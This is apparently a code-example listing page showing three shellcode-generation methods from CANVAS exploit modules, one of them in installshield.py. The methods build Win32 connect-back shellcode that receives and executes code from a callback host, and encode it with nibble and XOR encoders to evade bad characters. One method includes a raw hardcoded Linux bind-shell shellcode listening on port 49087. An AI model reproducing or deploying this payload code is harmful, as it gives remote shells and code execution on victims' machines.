コード例 #1
0
ファイル: installshield.py プロジェクト: zu1kbackup/Canvas 
    def createShellcode(self):
        sc=shellcodeGenerator.win32()                                                                                        
        sc.addAttr("findeipnoesp",{"subespval": self.subesp}) #don't mess with eip
        sc.addAttr("revert_to_self_before_importing_ws2_32", None)
        sc.addAttr("tcpconnect",{"port":self.callback.port,"ipaddress":self.callback.ip})                                                              
        sc.addAttr("CreateThreadRecvExecWin32",{"socketreg": "FDSPOT"}) #MOSDEF
        sc.addAttr("ExitThread",None)

        rawshellcode=sc.get()
        
        print "[!] RAW Shellcode len: %d bytes" % len(rawshellcode)
        
        #first encode to nibble
        enc = nibble_encoder.intel_nibbleencoder()
        bad = ""
        for i in range(ord('A'),ord('Z')+1):
            #for a-z inclusive, these are badchars
            bad+=chr(i)
        enc.setbadstring(bad)
        rawshellcode = enc.encode(rawshellcode)
        
        print "[!] Nibble Encoded Shellcode len: %d bytes" % len(rawshellcode)
        
        #then do a xor enconding using the real badstring
        encoder = xorencoder.simpleXOR()
        encoder.setbadstring(self.badstring)
        encoder.find_key(rawshellcode)
        self.shellcode = encoder.encode(rawshellcode)
                
        print "[!] Shellcode len: %d bytes" % len(self.shellcode)
        
        if not len(self.shellcode):
            return None

        return self.shellcode
コード例 #2
0
    def createShellcode(self):

        if targets[self.version][0].lower().find("linux") > -1:

            # Shellcode bind port 49087
            #
            # 1/ can't use a callback shellcode because dsmserv dies after the
            # exploitation. so the connection is broken.
            #
            # 2/ the solution is to use a multi shellcode but I'm not yet at
            # ease with API CANVAS
            #
            # TODO: MOSDEF
            #
            self.shellcode = "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96\x43\x52\x66\x68\xbf\xbf\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1\xb0\x66\xcd\x80\x93\xb6\x0c\xb0\x03\xcd\x80\x89\xdf\xff\xe1"

        elif targets[self.version][0].lower().find("windows") > -1:

            try:

                self.createSmallWin32Shellcode(self.callback.ip,
                                               self.callback.port,
                                               subesp=3000)
                encoder = nibble_encoder.intel_nibbleencoder()
                encoder.setbadstring(self.badstring)
                self.shellcode = encoder.encode(self.shellcode)

            except:

                self.log(
                    "[!] did you forget to set -l -d on the commandline !?")
                self.shellcode = "\xcc" * 256

        #print "[!] shellcode length is %d bytes"% len(self.shellcode)
        return self.shellcode
コード例 #3
0
    def createShellcode(self):
        host = self.callback.ip
        port = self.callback.port
        self.createWin32Shellcode("", host, port)

        encoder = nibble_encoder.intel_nibbleencoder()
        encoder.setbadstring(self.badstring)
        self.shellcode = encoder.encode(self.shellcode)
        return self.shellcode